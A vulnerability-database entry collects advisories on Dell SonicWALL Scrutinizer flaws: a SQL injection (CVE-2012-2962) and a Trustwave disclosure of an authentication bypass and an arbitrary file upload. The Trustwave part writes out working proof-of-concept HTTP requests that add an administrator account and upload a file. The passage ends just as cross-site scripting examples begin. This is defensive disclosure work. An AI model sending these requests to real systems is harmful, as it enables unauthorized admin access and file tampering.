----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide. Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends: http://secunia.com/psi
TITLE: Dell SonicWALL Scrutinizer "q" SQL Injection Vulnerability
SECUNIA ADVISORY ID: SA50052
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/50052/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=50052
RELEASE DATE: 2012-07-26
DISCUSS ADVISORY: http://secunia.com/advisories/50052/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/50052/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50052
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: muts has reported a vulnerability in Dell SonicWALL Scrutinizer, which can be exploited by malicious people to conduct SQL injection attacks.
Input passed via the "q" parameter to d4d/statusFilter.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The vulnerability is reported in versions 9.0.0, 9.0.1, and 9.5.0.
SOLUTION: Update to version 9.5.2.
PROVIDED AND/OR DISCOVERED BY: muts, Offensive Security.
ORIGINAL ADVISORY: muts: http://www.exploit-db.com/exploits/20033/
US-CERT (VU#404051) http://www.kb.cert.org/vuls/id/404051
Dell: http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201207-0237",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "scrutinizer",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "9.5.2"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "dell computer",
"version": null
},
{
"model": "sonicwall scrutinizer",
"scope": "lte",
"trust": 0.8,
"vendor": "dell",
"version": "9.5.0"
},
{
"model": "sonicwall scrutinizer with flow analytics module",
"scope": "lte",
"trust": 0.8,
"vendor": "dell",
"version": "9.5.0"
},
{
"model": "scrutinizer",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "9.0.0"
},
{
"model": "scrutinizer",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "9.5.0"
},
{
"model": "scrutinizer",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "9.0.1"
},
{
"model": "scrutinizer",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "8.6.2"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#404051"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003307"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-563"
},
{
"db": "NVD",
"id": "CVE-2012-2962"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:dell:sonicwall_scrutinizer",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:dell:sonicwall_scrutinizer_with_flow_analytics_module",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003307"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "muts",
"sources": [
{
"db": "BID",
"id": "54625"
}
],
"trust": 0.3
},
"cve": "CVE-2012-2962",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2012-2962",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 6.5,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "PARTIAL",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 5.4,
"exploitability": "FUNCTIONAL",
"exploitabilityScore": 8.0,
"id": "CVE-2012-2962",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "OFFICIAL FIX",
"reportConfidence": "CONFIRMED",
"severity": "MEDIUM",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInteractionRequired": null,
"vector_string": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "VHN-56243",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-2962",
"trust": 1.6,
"value": "MEDIUM"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2012-2962",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201207-563",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-56243",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2012-2962",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#404051"
},
{
"db": "VULHUB",
"id": "VHN-56243"
},
{
"db": "VULMON",
"id": "CVE-2012-2962"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003307"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-563"
},
{
"db": "NVD",
"id": "CVE-2012-2962"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection vulnerability in d4d/statusFilter.php in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.2 allows remote authenticated users to execute arbitrary SQL commands via the q parameter. Dell SonicWALL Scrutinizer 9.5.0 and older versions contain a SQL injection vulnerability. Dell SonicWALL Scrutinizer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. \nA successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. \nDell SonicWALL Scrutinizer 9.0.1 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. ----------------------------------------------------------------------\n\nWe are millions! Join us to protect all Pc\u0027s Worldwide. \nDownload the new Secunia PSI 3.0 available in 5 languages and share it with your friends:\nhttp://secunia.com/psi\n\n----------------------------------------------------------------------\n\nTITLE:\nDell SonicWALL Scrutinizer \"q\" SQL Injection Vulnerability\n\nSECUNIA ADVISORY ID:\nSA50052\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/50052/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=50052\n\nRELEASE DATE:\n2012-07-26\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/50052/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/50052/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=50052\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nmuts has reported a vulnerability in Dell SonicWALL Scrutinizer,\nwhich can be exploited by malicious people to conduct SQL injection\nattacks. \n\nInput passed via the \"q\" parameter to d4d/statusFilter.php is not\nproperly sanitised before being used in SQL queries. This can be\nexploited to manipulate SQL queries by injecting arbitrary SQL code. \n\nThe vulnerability is reported in versions 9.0.0, 9.0.1, and 9.5.0. \n\nSOLUTION:\nUpdate to version 9.5.2. \n\nPROVIDED AND/OR DISCOVERED BY:\nmuts, Offensive Security. \n\nORIGINAL ADVISORY:\nmuts:\nhttp://www.exploit-db.com/exploits/20033/\n\nUS-CERT (VU#404051)\nhttp://www.kb.cert.org/vuls/id/404051\n\nDell:\nhttp://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-2962"
},
{
"db": "CERT/CC",
"id": "VU#404051"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003307"
},
{
"db": "BID",
"id": "54625"
},
{
"db": "VULHUB",
"id": "VHN-56243"
},
{
"db": "VULMON",
"id": "CVE-2012-2962"
},
{
"db": "PACKETSTORM",
"id": "115035"
}
],
"trust": 2.88
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.kb.cert.org/vuls/id/404051",
"trust": 0.8,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=20204",
"trust": 0.2,
"type": "exploit"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-56243",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#404051"
},
{
"db": "VULHUB",
"id": "VHN-56243"
},
{
"db": "VULMON",
"id": "CVE-2012-2962"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#404051",
"trust": 3.5
},
{
"db": "NVD",
"id": "CVE-2012-2962",
"trust": 2.9
},
{
"db": "BID",
"id": "54625",
"trust": 2.1
},
{
"db": "SECUNIA",
"id": "50052",
"trust": 2.1
},
{
"db": "EXPLOIT-DB",
"id": "20033",
"trust": 1.9
},
{
"db": "OSVDB",
"id": "84232",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003307",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201207-563",
"trust": 0.7
},
{
"db": "XF",
"id": "77148",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "20204",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-74090",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-73932",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "115235",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "114950",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-56243",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2012-2962",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "115035",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#404051"
},
{
"db": "VULHUB",
"id": "VHN-56243"
},
{
"db": "VULMON",
"id": "CVE-2012-2962"
},
{
"db": "BID",
"id": "54625"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003307"
},
{
"db": "PACKETSTORM",
"id": "115035"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-563"
},
{
"db": "NVD",
"id": "CVE-2012-2962"
}
]
},
"id": "VAR-201207-0237",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-56243"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:27:32.886000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SonicWALL Scrutinizer",
"trust": 0.8,
"url": "http://www.dell.com/us/enterprise/p/sonicwall-scrutinizer/pd"
},
{
"title": "Dell SonicWALL Scrutinizer Service Bulletin for SQL injection vulnerability",
"trust": 0.8,
"url": "http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003307"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-56243"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003307"
},
{
"db": "NVD",
"id": "CVE-2012-2962"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://www.kb.cert.org/vuls/id/404051"
},
{
"trust": 2.7,
"url": "http://www.sonicwall.com/shared/download/dell_sonicwall_scrutinizer_service_bulletin_for_sql_injection_vulnerability_cve.pdf"
},
{
"trust": 2.0,
"url": "http://www.plixer.com/press-releases/plixer-releases-9-5-2.html"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/bid/54625"
},
{
"trust": 1.8,
"url": "http://www.exploit-db.com/exploits/20033"
},
{
"trust": 1.8,
"url": "http://www.osvdb.org/84232"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/50052"
},
{
"trust": 1.2,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/77148"
},
{
"trust": 0.8,
"url": "about vulnerability notes"
},
{
"trust": 0.8,
"url": "contact us about this vulnerability"
},
{
"trust": 0.8,
"url": "provide a vendor statement"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2962"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu404051"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-2962"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/77148"
},
{
"trust": 0.6,
"url": "http://http://www.plixer.com/press-releases/plixer-releases-9-5-2.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/89.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=26471"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/20204/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=50052"
},
{
"trust": 0.1,
"url": "http://secunia.com/psi"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/50052/"
},
{
"trust": 0.1,
"url": "http://www.exploit-db.com/exploits/20033/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/50052/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#404051"
},
{
"db": "VULHUB",
"id": "VHN-56243"
},
{
"db": "VULMON",
"id": "CVE-2012-2962"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003307"
},
{
"db": "PACKETSTORM",
"id": "115035"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-563"
},
{
"db": "NVD",
"id": "CVE-2012-2962"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#404051"
},
{
"db": "VULHUB",
"id": "VHN-56243"
},
{
"db": "VULMON",
"id": "CVE-2012-2962"
},
{
"db": "BID",
"id": "54625"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003307"
},
{
"db": "PACKETSTORM",
"id": "115035"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-563"
},
{
"db": "NVD",
"id": "CVE-2012-2962"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-07-25T00:00:00",
"db": "CERT/CC",
"id": "VU#404051"
},
{
"date": "2012-07-30T00:00:00",
"db": "VULHUB",
"id": "VHN-56243"
},
{
"date": "2012-07-30T00:00:00",
"db": "VULMON",
"id": "CVE-2012-2962"
},
{
"date": "2012-07-22T00:00:00",
"db": "BID",
"id": "54625"
},
{
"date": "2012-07-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-003307"
},
{
"date": "2012-07-26T04:01:11",
"db": "PACKETSTORM",
"id": "115035"
},
{
"date": "2012-07-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201207-563"
},
{
"date": "2012-07-30T22:55:03.020000",
"db": "NVD",
"id": "CVE-2012-2962"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-05-15T00:00:00",
"db": "CERT/CC",
"id": "VU#404051"
},
{
"date": "2018-03-12T00:00:00",
"db": "VULHUB",
"id": "VHN-56243"
},
{
"date": "2018-03-12T00:00:00",
"db": "VULMON",
"id": "CVE-2012-2962"
},
{
"date": "2012-08-03T06:22:00",
"db": "BID",
"id": "54625"
},
{
"date": "2012-08-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-003307"
},
{
"date": "2012-07-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201207-563"
},
{
"date": "2024-11-21T01:40:01.797000",
"db": "NVD",
"id": "CVE-2012-2962"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201207-563"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dell SonicWALL Scrutinizer SQL injection vulnerability",
"sources": [
{
"db": "CERT/CC",
"id": "VU#404051"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "sql injection",
"sources": [
{
"db": "PACKETSTORM",
"id": "115035"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-563"
}
],
"trust": 0.7
}
}
var-201207-0529
Vulnerability from variot
d4d/uploader.php in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allows remote attackers to create or overwrite arbitrary files in %PROGRAMFILES%\Scrutinizer\snmp\mibs\ via a multipart/form-data POST request. Scrutinizer is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. Trustwave SpiderLabs Security Advisory TWSL2012-014: Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
Published: 07/27/12 Version: 1.0
Vendor: Plixer International (http://www.plixer.com) Product: Scrutinizer NetFlow and sFlow Analyzer Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions may be affected as well. Please note that the software can be found in a long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html for the partial list.
Product description: Network analysis tool for monitoring the overall network health and reports on which hosts, applications, protocols, etc. that are consuming network bandwidth.
Credits: Mario Ceballos of the Metasploit Project Jonathan Claudius of Trustwave Spiderlabs
Finding 1: HTTP Authentication Bypass Vulnerability CVE: CVE-2012-2626
The Scrutinizer web console provides a form-based login facility, requiring users to authenticate to gain access to further functionality. A tiered user access model is also used, where administrative and standard users have a different selection of permissible functions. Authentication and authorization is controlled by the cookie-based session management system. Although this is implemented in a standardized way, the session tokens are not required to perform privileged functions, such as adding users.
Example(s):
This request will add a user named "trustwave" with the password of "trustwave" to the administrative user group.
Request
POST /cgi-bin/admin.cgi HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
Response
HTTP/1.1 200 OK Date: Wed, 25 Apr 2012 17:52:15 GMT Server: Apache Vary: Accept-Encoding Content-Length: 19 Content-Type: text/html; charset=utf-8
{"new_user_id":"2"}
Finding 2: Arbitrary File Upload Vulnerability CVE: CVE-2012-2627
The Scrutinizer web console is prone to unauthenticated arbitrary file upload vulnerability.
Example(s):
This request will upload a test file to the following location:
'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'
Note: This affected folder also contains SNMP configuration files which could be overwritten if an attacker were to select the right file name.
Request
POST /d4d/uploader.php HTTP/1.0 Host: A.B.C.D User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593 Content-Length: 210
--_Part_949_3365333252_3066945593 Content-Disposition: form-data; name="uploadedfile"; filename="trustwave.txt" Content-Type: application/octet-stream
trustwave
--_Part_949_3365333252_3066945593--
Response
HTTP/1.1 200 OK Date: Wed, 25 Apr 2012 17:39:15 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 41 Connection: close Content-Type: text/html
{"success":1,"file_name":"trustwave.txt"}
Confirming on File System
C:>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt" trustwave
Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php CVE: CVE-2012-3848
The Scrutinizer web console suffers from multiple Cross Site Scripting vulnerabilities in the following pages:
1.) /d4d/contextMenu.php 2.) /d4d/exporters.php
These vulnerabilities include the following:
1.) XSS via arbitrary parameter 3.) XSS via referrer header
Example(s):
The following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php
Request 1
